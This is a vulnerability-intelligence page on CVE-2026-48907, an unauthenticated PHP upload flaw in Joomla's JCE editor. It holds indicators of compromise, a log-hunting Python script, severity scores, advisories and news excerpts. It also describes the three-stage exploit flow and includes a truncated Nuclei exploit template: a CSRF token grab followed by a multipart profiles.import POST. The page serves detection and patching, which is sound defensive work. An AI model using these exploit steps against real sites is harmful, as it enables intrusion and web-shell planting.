CVE-2026-48907
Published 2026-06-05
Priority: P1 · 98 · Critical · CVSS 4.0 base score 10
KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability (due 2026-06-19)
Exploited in the wild
EPSS: 80.42% (99.6th percentile)
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlacontenteditor.net | joomla_content_editor_extension_for_joomla | — | — |
Detection & IOCs (extracted from sources)
- url: POST /index.php?option=com_jce HTTP/1.1
- filename: nuclei-<md5(Hostname+'phuJ4OoP')>.xml.php
- path: /tmp/nuclei-<md5(Hostname+'phuJ4OoP')>.xml.php
- Hunt for unauthenticated POST requests to /index.php?option=com_jce with task=profiles.import in web server access logs; this is the exploit entry point.
- Look for suspicious or rogue editor profiles created in JCE; attackers import a malicious profile to stage a web shell for persistent backdoor access.
- Check the Joomla /tmp/ directory for .xml.php double-extension files; the exploit PoC drops a file named nuclei-<md5hash>.xml.php there.
- The exploit uses a multipart form-data POST with a profile_file field containing a filename with a .xml.php double extension to bypass upload filters.
- Updating JCE closes the entry point but does NOT remove attacker artifacts; scan for web shells and rogue profiles even after patching.
- The exploit flow is three-stage: (1) GET homepage to extract CSRF token, (2) POST malicious profile import with CSRF token, (3) GET the dropped .xml.php web shell to confirm execution.
- CSRF token is extracted from the page body via regex pattern matching '"csrf.token" : "<32 hex chars>"' and reused in the exploit POST request.
- Note: the patched version differs between sources. BleepingComputer states the fix is in JCE Pro 2.9.99.6, while The Hacker News states it was patched in version 2.9.99.5 released June 3, 2026. Verify the exact minimum safe version against the vendor changelog before deploying detection version-exclusion rules.
- Note: the affected version range is JCE 1.0.0 through 2.9.99.4 per The Hacker News; ensure detection/inventory queries cover this full historical range.
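The hunting guidance above maps directly onto a small log-and-filesystem triage script. The following Python is an added example written for this page; it is not code from any of the cited sources or from the JCE project. It assumes Apache/nginx "combined" access-log format, and the log lines and the tmp-directory listing it runs over are constructed samples, not real traffic. It flags the three stages of the exploit flow (front-end POST to the com_jce entry point, explicit task=profiles.import where a client put it in the query string, and a successful GET of an .xml.php under /tmp/), correlates stages by source IP, and lists double-extension files in the tmp directory.

```python
"""Hunt for CVE-2026-48907 artifacts in web-server access logs and the Joomla tmp dir.

Added example, not code from the page's sources or from the JCE project.
Assumes Apache/nginx "combined" access-log format; the log lines and the
directory listing below are constructed samples, not real traffic.
"""
import re
from typing import Dict, Iterable, List

# Combined log format. The third field is the HTTP basic-auth user only;
# Joomla session state is never visible here, so every front-end POST to
# com_jce has to be treated as potentially unauthenticated.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Entry point is the site front end (/index.php), not /administrator/index.php.
_ENTRY = re.compile(r'^/index\.php\?(?:.*&)?option=com_jce(?:&|$)')
# task= normally travels in the multipart body (invisible in access logs), but
# some clients put it in the query string, which lets us rate the hit higher.
_IMPORT = re.compile(r'(?:\?|&)task=profiles\.import(?:&|$)')
# Stage 3 of the PoC fetches the dropped .xml.php under /tmp/.
_SHELL_GET = re.compile(r'^/tmp/[^/?]+\.xml\.php(?:\?.*)?$')
# Drop name reported for the PoC: nuclei-<md5>.xml.php.
_NUCLEI_NAME = re.compile(r'^nuclei-[0-9a-f]{32}\.xml\.php$')

# Constructed sample: one full exploit chain from 203.0.113.7, one explicit
# profiles.import POST from 198.51.100.4, one admin-side request to ignore.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [17/Jun/2026:08:01:12 +0000] "GET / HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Jun/2026:08:01:13 +0000] "POST /index.php?option=com_jce HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Jun/2026:08:01:14 +0000] "GET /tmp/nuclei-0123456789abcdef0123456789abcdef.xml.php HTTP/1.1" 200 37 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Jun/2026:08:02:00 +0000] "POST /index.php?option=com_jce&task=profiles.import HTTP/1.1" 200 812 "-" "curl/8.4"
192.0.2.9 - admin [17/Jun/2026:08:03:00 +0000] "POST /administrator/index.php?option=com_jce&task=profiles.import HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""
# Constructed sample listing of <joomla>/tmp/.
SAMPLE_TMP_LISTING = [
    "index.html",
    "nuclei-0123456789abcdef0123456789abcdef.xml.php",
    "profile.xml.php",
    "profile.xml",
]


def hunt_access_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per access-log line that matches a stage of the exploit."""
    findings = []
    for raw in lines:
        m = _COMBINED.match(raw)
        if not m:
            continue  # not combined format: skip rather than guess
        method, target, status = m['method'], m['target'], m['status']
        reason = None
        if method == 'POST' and _ENTRY.match(target):
            reason = ('front-end POST with task=profiles.import'
                      if _IMPORT.search(target) else 'front-end POST to com_jce')
        elif method == 'GET' and status == '200' and _SHELL_GET.match(target):
            reason = 'executed .xml.php under /tmp (possible web shell)'
        if reason:
            findings.append({'ip': m['ip'], 'ts': m['ts'],
                             'target': target, 'reason': reason})
    return findings


def exploit_chains(findings: List[Dict[str, str]]) -> List[str]:
    """IPs that both posted to the com_jce entry point and fetched a /tmp .xml.php."""
    posts = {f['ip'] for f in findings if f['reason'].startswith('front-end POST')}
    shells = {f['ip'] for f in findings if f['reason'].startswith('executed')}
    return sorted(posts & shells)


def suspicious_tmp_files(names: Iterable[str]) -> List[Dict[str, str]]:
    """Flag .xml.php double-extension files in a Joomla tmp directory listing."""
    out = []
    for name in names:
        if _NUCLEI_NAME.match(name):
            out.append({'name': name, 'reason': 'matches PoC drop name nuclei-<md5>.xml.php'})
        elif name.lower().endswith('.xml.php'):
            out.append({'name': name, 'reason': '.xml.php double extension'})
    return out


if __name__ == '__main__':
    found = hunt_access_log(SAMPLE_ACCESS_LOG.splitlines())
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['target']}")
    print("full chains from:", exploit_chains(found))
    for f in suspicious_tmp_files(SAMPLE_TMP_LISTING):
        print("tmp:", f['name'], '-', f['reason'])
```

Two practical points when running this against a real site: the Joomla tmp directory is whatever `$tmp_path` in configuration.php points to, so feed `suspicious_tmp_files` a listing of that directory rather than assuming `/tmp`; and a plain front-end POST to com_jce is only a medium-confidence hit on its own, which is why the script reports per-IP chains separately.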
CVSS provenance
- NVD (v4.0): 10.0 CRITICAL, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:Red
- VulnCheck: 10.0 CRITICAL
- CISA: 10.0 CRITICAL
VulDB
joomlacontenteditor Content Editor Extension up to 2.9.99.4 on Joomla JCE Editor Extension access control (EUVD-2026-34789)
VulDB · 2026-06-17 · CVSS 10.0 · CRITICAL
A vulnerability has been found in joomlacontenteditor Content Editor Extension up to 2.9.99.4 on Joomla and classified as critical. Affected by this issue is some unknown functionality of the component JCE Editor Extension. This manipulation causes improper access controls.
This vulnerability is registered as CVE-2026-48907. Remote exploitation of the attack is possible. Furthermore, an exploit is available.
GHSA
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
GHSA (unreviewed) · 2026-06-05 · CRITICAL · CWE-284
VulnCheck
Improper Access Control
VulnCheck · 2026 · CVSS 10.0 · CRITICAL
A vulnerability in the JCE editor extension for Joomla allows the creation of new editor profiles for unauthenticated users, ultimately resulting in PHP code upload and execution.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.acn.gov.it/portale/w/joomla-jce-sfruttamento-attivo-in-rete-della-cve-2026-48907
Exploit PoC: https://vulncheck.com/xdb/609673988f8e; https://vulncheck.com/xdb/7b5f88d13907; https://vulncheck.com/xdb/584961b43d7c
CISA
Widget Factory Joomla Content Editor Improper Access Control Vulnerability
CISA · 2026-06-16 · CVSS 10.0 · CRITICAL · CWE-284
Affected: Widget Factory Joomla Content Editor
Widget Factory Joomla Content Editor contains an improper access control vulnerability which could allow for upload and execution of PHP code via the creation of new editor profiles for unauthenticated users.
Required Action: Apply mitigations in accordance with vendor instructions, ensuring compliance with CISA’s BOD 26-04 Prioritizing Security Updates Based on Risk (see URL in Notes) guidance and CISA’s “Forensics Triage Requirements” (see URL in Notes). Follow applicable BOD 26-04 guidance for cloud services or discontinue use of the product if mitigations are unavailable. Stakeholders are responsible for evaluating each asset's internet exposure and
No detection rules found.
Nuclei
Joomla! JCE extension < 2.9.99.5 unauthenticated RCE
Nuclei · CVSS 10.0 · CRITICAL
```yaml
tmp_file: "{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "Joomla")'
          - 'contains(body, "csrf.token")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        internal: true
        regex:
          - '"csrf\.token"\s*:\s*"([a-f0-9]{32})"'

  - raw:
      - |
        POST /index.php?option=com_jce HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d

        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="task"

        profiles.import
        --66dea244639dd05378afdad58c2c9c1d
        Content-Disposition: form-data; name="{{csrf_token}}"

        1
        --66dea244639dd05
```
Hackernews
⚡ Weekly Recap: Browser Bugs, EDR Killers, TV Botnet, OpenBSD Flaw, Android Trojan, and More
The Hacker News · 2026-06-22 · CVSS 9.8 · CVE-2026-24858 [CRITICAL]
It’s Monday again.
This week’s threat list looks painfully familiar: abused integrations, fake tools, poisoned websites, ransomware crews trying to shut down security tools, and mobile malware asking for way too much control.
The annoying part is how little of this feels new. Weak credentials, sketchy downloads, browser extensions with too much access, and WordPress sites are used to push more attacks. Nothing clever. Just sloppy, cheap, and effective.
Here’s the Monday recap. Let’s get into the week’s mess.
## ⚡ Threat of the We
Bleepingcomputer
CISA orders feds to patch max severity Joomla plugin flaw by Friday
BleepingComputer · 2026-06-17 · CVSS 10.0 · CRITICAL
By Sergiu Gatlan
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch a maximum-severity flaw in the Widget Factory Joomla Content Editor (JCE) plugin that is being actively exploited in the wild.
Tracked as CVE-2026-48907, this vulnerability can be exploited by threat actors without privileges to achieve code execution via low-complexity attacks targeting Joomla deployments that use the JCE WYSIWYG editor plugin.
"Widget Factory Joomla Content Editor contains an improper access control vulnerability which could allow for upload and execution of PHP code via the creation of new editor profiles for unauthenticated users," CISA warned on Tuesday.
The JCE security tea
Hackernews
CISA Warns of Actively Exploited Joomla JCE Flaw Allowing PHP Code Execution
The Hacker News · 2026-06-17 · CVSS 10.0 · CRITICAL
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a maximum-severity security flaw impacting Widget Factory Joomla Content Editor (JCE) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The vulnerability, tracked as CVE-2026-48907 (CVSS score: 10.0), is a case of improper access control that could facilitate arbitrary code execution.
"Widget Factory Joomla Content Editor contains an improper access control vulnerability which could allow for upload and execution of PHP code
Timeline
- 2026-06-05: Published
- 2026-06-16: Added to CISA KEV
- Exploited in the wild